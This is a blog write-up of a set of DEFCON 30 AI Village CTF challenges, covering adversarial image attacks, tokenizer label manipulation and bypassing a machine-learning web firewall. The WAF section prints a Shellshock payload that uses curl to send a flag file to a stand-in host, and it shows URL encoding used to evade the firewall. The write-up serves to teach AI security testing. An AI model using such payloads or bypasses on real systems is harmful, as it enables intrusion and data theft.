0-Days and Tokens and Salts, Oh My! (An overview of my DEFCON AIV CTF Challenges)

12 min read · Sep 19, 2022


I wrote five CTF challenges for the DEFCON 30 AI Village Capture The Flag, so I thought I would write a blog post covering the solutions and inner workings of the challenges, especially WAF and Token, as these used radically different techniques to the majority of the CTF and seemed to take a lot of the community by surprise, partly because these two challenges had their source code hidden.


For DEFCON 30, the AI Village organized an AI Capture The Flag competition hosted on Kaggle. The goal of a CTF is usually to hack or break a system to uncover a flag hidden somewhere within it. For the AI CTF, the goals were generally less focused on vulnerabilities and more on adversarial samples and model poisoning. The competition ran between the 12th of August and the 12th of September 2022, ending with 3,555 individuals joining the competition and 668 participants making a submission. Kaggle also put up $25,000 in prizes, which was incredible.


I’m JankhJankh, a penetration tester from Australia, where I specialize in red teaming and infrastructure-level web attacks. AI hacking research has been my hobby for a few years now; I’ve given a talk and run a workshop on pentesting ML with the goal of helping to build maturity in the space.

My ML background comes from my engineering degree, where I did my honours in developing Multimodal Neural Networks for textile identification to automate clothing recycling.

My Challenges

I provided the following challenges for the DEFCON 30 AI Village CTF:

  • Forensics
  • Theft
  • Salt
  • WAF
  • Token

These challenges were part of a workshop I ran in Australia earlier in the year. This workshop was white-box, with each user being provided all source code for the challenges other than flags and major spoilers.

The entire workshop is now available online if you would like to try the remaining 10 or so challenges, which I highly recommend, as they contain a number of challenges that were difficult to make multi-player, such as dataset poisoning and code execution challenges.


PS: I wrote a lot of these challenges in the early days of COVID, so a lot of the libraries are out of date. Luckily, the Docker container in the repository handles all of that for you.


Forensics

While you can solve this challenge by just running strings on the file and grepping for the flag, the goal was to give intro-level players a flag just for loading a model and looking at what it has inside.

Viewing the config for a Keras model

import tensorflow as tf

# Load the model, then inspect what it contains
model = tf.keras.models.load_model('./forensics.h5')
model.summary()
print(model.get_config())


Theft

This challenge was initially built as a web app: users have to retrieve the encrypted model and then decrypt it to recover the pickle file within (it’s AES-CBC with a password from rockyou). The server also returns confidences, so you can do an online attack rather than an offline one if you want to circumvent the decryption stage.

Once you have the model, the sample exploit code provided (https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20) gets you 90% of the way there; just change the class names and class IDs.

# Lines changed from the starting code:

TURTLE_STR = "loggerhead"

if __name__ == "__main__":
    create_img("./owl.jpg", "./owl_turtle.png", "./model.h5", TURTLE_STR, TURTLE_IDX)
    assert is_similar_img("./owl.jpg", "./owl_turtle.png")

The full solution code can be found here:

Executing this script will slightly modify the image, as seen below.

Unmodified image on the left and the adversarial sample on the right
Submitting the modified image


Salt

The secret sauce of Salt is that the randomness added to each image is reasonably small: just big enough to break most solutions to Theft. By cranking up the strength of your own perturbation, you can make your changes outperform the random changes the application makes.

# Same as the Theft solution except the clipping line below,
# where the bounds have been widened from (-1.0, 1.0) to (-10.0, 10.0)

OWL_IDX = 24
OWL_STR = "great_grey_owl"

while cost < 0.99:
    cost, gradients = grab_cost_and_gradients_from_model([hacked_image, 0])
    hacked_image += np.sign(gradients) * learning_rate
    hacked_image = np.clip(hacked_image, max_change_below, max_change_above)
    hacked_image = np.clip(hacked_image, -10.0, 10.0)
    print("Model's predicted likelihood that the image is a " + target_str + ": {:.8}%".format(cost * 100))

hacked_image = hacked_image.reshape((224, 224, 3))
img = array_to_img(hacked_image)

if __name__ == "__main__":
    create_img("./turtle.jpg", "./turtle_owl.png", "./model.h5", OWL_STR, OWL_IDX)
    assert is_similar_img("./turtle.jpg", "./turtle_owl.png")

Executing this script will slightly modify the image, as seen below.

Unmodified image on the left and adversarial sample on the right
Submitting the modified image

You can also beat this with any adversarial technique that is stronger than the salt used to prevent adversarial attacks; on the whole, it’s pretty tough to balance model accuracy against any kind of salting defence.
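A toy linear model illustrates why: a gradient-aligned step of size eps shifts the score by eps times the L1 norm of the weights, while small zero-mean salt mostly cancels out. This is a made-up stand-in, not the challenge model.

```python
import random

random.seed(0)
n = 1000
w = [random.uniform(-1, 1) for _ in range(n)]   # toy linear model weights
x = [random.uniform(-1, 1) for _ in range(n)]   # toy "image"

def score(v):
    return sum(wi * vi for wi, vi in zip(w, v))

eps = 0.1     # adversarial step size (our perturbation)
sigma = 0.02  # server-side salt magnitude (the defence)

# FGSM-style step: push every pixel eps in the direction of the gradient (here, w)
adv = [xi + eps * (1 if wi > 0 else -1) for wi, xi in zip(w, x)]
# The server then salts the submitted image with small random noise
salted = [ai + random.uniform(-sigma, sigma) for ai in adv]

adv_shift = score(adv) - score(x)             # grows linearly with eps
salt_shift = abs(score(salted) - score(adv))  # zero-mean, mostly cancels
assert adv_shift > salt_shift                 # crank eps above sigma and the salt can't keep up
```

As long as your step size eps exceeds the salt magnitude sigma, the adversarial shift deterministically dominates, which is exactly why cranking up the randomness of your own changes beats the defence.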


Combining the solutions to Theft and Salt leaves you with one of my all-time favourite tables:

If you liked these two challenges, the workshop has 4 more of these challenges, two about extracting the models and two with different salting techniques to bypass.


Token

Token was originally designed as a white-box CTF challenge, with participants being given the source code. It is based on a bug I found in another challenge of mine while making it.

The solution requires no brute force; however, if you haven’t messed around with tokenizers, a little targeted brute forcing could help. To anyone who decided to brute force all ~3 million combinations to get the solution, I hope you will find the real solution enlightening. Also, you probably owe Joe and Moo a drink for all the times you overloaded that host.

The goal of this challenge is simple. A server uses a sentiment analysis model to classify the word SECRETKEY. This model has been trained on a wordlist which you are provided, and you can tell the server to remove two lines from this wordlist before the model uses it to classify the word SECRETKEY.

Before we discuss this challenge, it is important to discuss what a tokenizer is, both categorically and in its specific Python implementation. Every classification model has a step somewhere in its implementation where a labeling function replaces a class ID with a human-understandable version. For example, CIFAR-10 has 10 classes, each with an ID between 0 and 9 (or 1 and 10 if you are cursed to still use MATLAB). At some point, class 0 must be converted to the word “airplane” so that humans can interpret the results of classification. This step is absolutely vital to the process: swapping classes 0 and 1 will lead to consistently poisoned results between the two classes. Additionally, this step often takes place outside the model itself and lacks the scrutiny the rest of the model receives.

This labeling process changes drastically from implementation to implementation. The tokenizer is the Python text-labeling function that takes a dataset and returns a dictionary mapping every word used in the dataset to a corresponding class ID.

As you can probably tell from my heavy-handed infodump, the goal is to swap the label of SECRETKEY with something else. But how is this possible? Tokenizers return consistent results: if two people run a tokenizer over the same dataset, the words will be labeled in the same order. We can have a look at this by viewing the tokenizer for the provided CSV.

Observing the tokenizer created from the CSV dataset

As you can see, secretkey is at class 4, meaning we would likely need to swap it with class 3 or class 5. By either reading the documentation or having a look in the CSV, you can identify that these classes are assigned by how frequently each word appears in the dataset: “the” appears 408 times, “i” 320 times, “blank” 220 times, “secretkey” 216 times, and “and” 195 times. As the counts for “blank” and “secretkey” are only 4 apart, removing 4 occurrences of the word “blank” would leave both at 216 occurrences; the only two rows in the dataset where this is possible are 337 and 493. Deleting these two rows and running the tokenizer again, we can see that the labels for “blank” and “secretkey” have swapped. When two words have the same frequency, the first word encountered is given precedence*.

*To the best of my knowledge, I struggled to find documentation on this exact feature.

Row 337 containing the word blank twice
Row 493 containing the word blank twice
Deleting these two rows from the CSV and reusing the tokenizer shows that the labels for secretkey and blank have been swapped
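The tie-break behaviour can be checked with a small pure-Python mock of the tokenizer. This mimics my understanding of the ordering described above (frequency descending, ties broken by first appearance), on a made-up two-row corpus rather than the challenge CSV:

```python
from collections import Counter

def word_index(texts):
    # Mimics the tokenizer ordering described above: frequency descending,
    # with ties broken by first appearance in the corpus (assumed behaviour)
    counts = Counter()
    first_seen = {}
    for line in texts:
        for word in line.lower().split():
            first_seen.setdefault(word, len(first_seen))
            counts[word] += 1
    ranked = sorted(counts, key=lambda w: (-counts[w], first_seen[w]))
    return {w: i + 1 for i, w in enumerate(ranked)}  # class IDs start at 1

corpus = ["secretkey blank", "blank"]  # toy rows, not the real CSV
assert word_index(corpus) == {"blank": 1, "secretkey": 2}  # blank wins on count

corpus_after = ["secretkey blank"]  # "delete" the row containing the extra blank
assert word_index(corpus_after) == {"secretkey": 1, "blank": 2}  # tie: first word seen wins
```

Removing just enough occurrences to force a tie flips the two labels, which is the entire vulnerability in miniature.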

However, submitting the numbers 337 and 493 is unsuccessful. This is due to the CSV having a header row.

Submitting lines 493 and 337 to the server is unsuccessful
Viewing the CSV in a text editor

As this CSV has a header row, these values are both off by one, so the final CSV indexes to submit are 336 and 492, which get the flag.

Submitting lines 492 and 336 successfully returns the flag

These two numbers should be the only numbers that can synchronize the label successfully.
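The header-row off-by-one can be sanity-checked in a few lines (the CSV contents here are made up for illustration):

```python
# A text editor numbers every line starting at 1, header included
raw = "text\nfirst row\nsecond row\nthird row\n"
editor_lines = raw.splitlines()

# The server strips the header before indexing the data rows
data_rows = editor_lines[1:]

editor_line = 3  # "second row" as shown in a text editor
assert editor_lines[editor_line - 1] == "second row"
# Subtract one for the header: editor line N corresponds to data row N-1
assert data_rows[(editor_line - 1) - 1] == "second row"
```

The same shift maps editor lines 337 and 493 onto the submitted indexes 336 and 492.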

In case anyone was wondering whether the server just looks for these two numbers, I can assure you the server actually does these calculations every time. You can download a copy of the challenge from the workshop and try it for yourself if you would like to see the magic in action.

When I first discovered it, I described this vulnerability as a Tokenizer Desynchronisation, and most people seem happy with that description. However, it can be applied to other labeling layers and processes, whether internal to the model or not, so a more appropriate name may be Label Desynchronisation. If you know of any stories or vulnerabilities where the labeling function itself was targeted, please send me a message, as I am collecting a list of real-world vulnerabilities against this under-scrutinized pillar of the classification-model ecosystem.


WAF

As discussed in the challenge description, a model has been trained to identify a 0-day vulnerability. The goal of the challenge was to identify the payload the Web Application Firewall (WAF) is built to block, and then bypass the WAF.

On the backend I used a very simple sentiment analysis model with the malicious payload inside it, such that it will block the request if a known malicious portion is visible.

We provided a sample base64-encoded malicious request to get people started:


As many people throughout the CTF raised, this starting payload looks like nonsense.

Base64 decoding the starting payload

However, this was actually meant as a way to guide the tester towards the correct solution: by prepending any base64 character to the start of this string, you will get something far more legible.

amFzaC== -> jash
gmFzaC== -> .ash

If testers were familiar with “bash”, this might lead them to attempt “YmFzaA==”, which is also blocked by the WAF, whereas any other character would not be blocked (as the model is only trained to block one specific payload).
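You can reproduce the alignment shift with the standard library. Note the string "mFzaC==" is a stand-in reconstructed from the two examples above, not the actual challenge sample:

```python
import base64

sample = "mFzaC=="  # stand-in tail, reconstructed from the examples above
for prefix in "agY":
    # Prepending one character shifts the 6-bit alignment of the whole string
    print(prefix + sample, "->", base64.b64decode(prefix + sample))
# amFzaC== -> b'jash'
# gmFzaC== -> b'\x82ash'
# YmFzaC== -> b'bash'
```

Each prepended character only changes the first decoded byte, which is why almost any prefix suddenly makes the rest of the plaintext legible.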

Base64 encoding bash to retrieve a payload to test
Submitting the new payload that is also blocked

Note: if players lacked the intuition to try the word bash, this conclusion can also be reached by trying various modifications of the starting string. As the provided hint tells players that strings are assessed in blocks of 5, you can make any change to this starting string and it will no longer be blocked by the WAF.

Safe request by prepending any character other than “Y”

Once a player has identified that they can distinguish malicious from non-malicious strings, they can submit payloads of four known malicious characters and one test character. As the model tests strings in sets of 5, the entire base64 keyspace can be tested in a single request.

Code to try every character prepended to the known bad string

As the model will stop upon the first occurrence of a malicious string, you can pull out the final result and that will be the malicious character:

Confidences returned by the server, noting YmFza is the only sample to have a different confidence

As we now have a technique for identifying the malicious characters one at a time, we can loop this request until we no longer find a malicious character:
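The whole extraction loop can be sketched against a mock of the WAF. Everything here is a stand-in: the secret is an arbitrary string (with all-unique characters, so every 5-gram is unique), and the mock flags a probe if any 5-character window of the secret appears in it, whereas the real challenge returned per-sample confidences that you compare in a single batched request:

```python
import string

B64_CHARS = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/="

# Mock secret payload (all-unique characters, so every 5-gram is unique)
SECRET = "QWERTYUIOPASDFGH"

def is_blocked(probe):
    # Mock WAF: flags the probe if any 5-character window of the secret appears in it
    return any(SECRET[i:i + 5] in probe for i in range(len(SECRET) - 4))

known = SECRET[-8:]  # stand-in for the provided sample (a suffix of the payload here)
while True:
    # Prepend each candidate character to the first 4 known-bad characters;
    # only the true preceding character forms a 5-gram the WAF recognises
    hits = [c for c in B64_CHARS if is_blocked(c + known[:4])]
    if not hits:
        break  # nothing flagged: we've reached the start of the payload
    known = hits[0] + known

assert known == SECRET  # the loop recovers the full mock payload
```

In the real challenge all candidates went out in one request and the odd-one-out confidence identified the hit, but the recurrence is the same: each round pins down one more character until no probe is flagged.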

Looping this previous code 30 times and adding any newly found bad chars to the list
Code execution output

This slowly builds out the final payload:


This payload does not work out of the box. As you can see, the base64 parameter is the only part of the string that the model was trained on: if you submit the entire string, the server will not be able to base64 decode it, and if you submit the base64-encoded string as is, the WAF will block it, as it is trained to do.

The payload in question is Shellshock, a classic payload from back in the day.

Decoding the full payload to reveal shellshock

To avoid mucking around with RCE and risking players DoSing each other, deleting the flag, and other such nonsense, I decided instead to give the flag to any player who sent this Shellshock payload. Note that any payload including this string would also work; I didn’t want to punish people for trying RCE. For example, the following payload would also return the flag to the player, as it contains the test string.

() { :;}; /bin/bash curl http://evil.internal/+`cat flag.txt`

If anyone would like to try the RCE version of this challenge, it and the rest of my challenges are available at https://github.com/JankhJankh/aictf

As mentioned, the WAF will block the exact payload required for the flag, so the additional step of a WAF bypass is required. Like all WAFs, there are a number of ways to bypass this one; the technique I most often find success with as a pentester is URL encoding: encoding each character such that the WAF reads a parameter in a different context to the final server. The following strings are functionally equivalent when viewed by a Flask web application; however, the WAF is not trained to block the latter.
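For instance (using a short stand-in rather than the full payload), percent-encoding every character hides the 5-grams from the WAF while a Flask app still receives the original string after decoding:

```python
from urllib.parse import unquote

payload = "YmFzaA=="  # stand-in for the full base64-encoded Shellshock payload
# Percent-encode every character, not just the reserved ones
encoded = "".join("%{:02X}".format(ord(c)) for c in payload)
print(encoded)  # %59%6D%46%7A%61%41%3D%3D

assert "YmFza" not in encoded       # the WAF's 5-character windows never see the payload
assert unquote(encoded) == payload  # but the server decodes it back before use
```

This is the classic context mismatch: the WAF inspects the raw query string while the application sees the decoded value, so any reversible encoding the model wasn't trained on walks straight past it.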


URL encoding bypassing the WAF

By URL encoding the entire payload, we can bypass the WAF and get the flag.

URL encoding the final payload
Submitting the encoded payload to get the flag

To conclude, this challenge aimed to teach penetration testers the logic flows to consider when looking at an AI model, and the hacking required is introductory enough that I think data scientists can get most of it with a bit of googling.

If you would like to see a younger version of me theorize this style of attack well before I made my AI CTF, here is a link to my Intro to Penetration Testing ML talk.



The CTF went incredibly smoothly for the first one the AI Village has ever run, and a lot of infrastructure was set up that will make future CTFs run even smoother.

Thanks for reading. If you have any feedback or want to chat about my challenges, you can find me at:

Special shoutouts to @moo_hax and @josephtlucas for putting in an incredible amount of work getting the CTF up to an incredible standard, and for keeping WAF and Token alive despite the immense amount of brute forcing these challenges copped during the competition.

Shoutouts to the other awesome folks who made challenges for the CTF:


And a final shoutout to Kaggle for hosting the CTF and putting up 25k in prizes.




Professional Pentester and AI unenthusiast.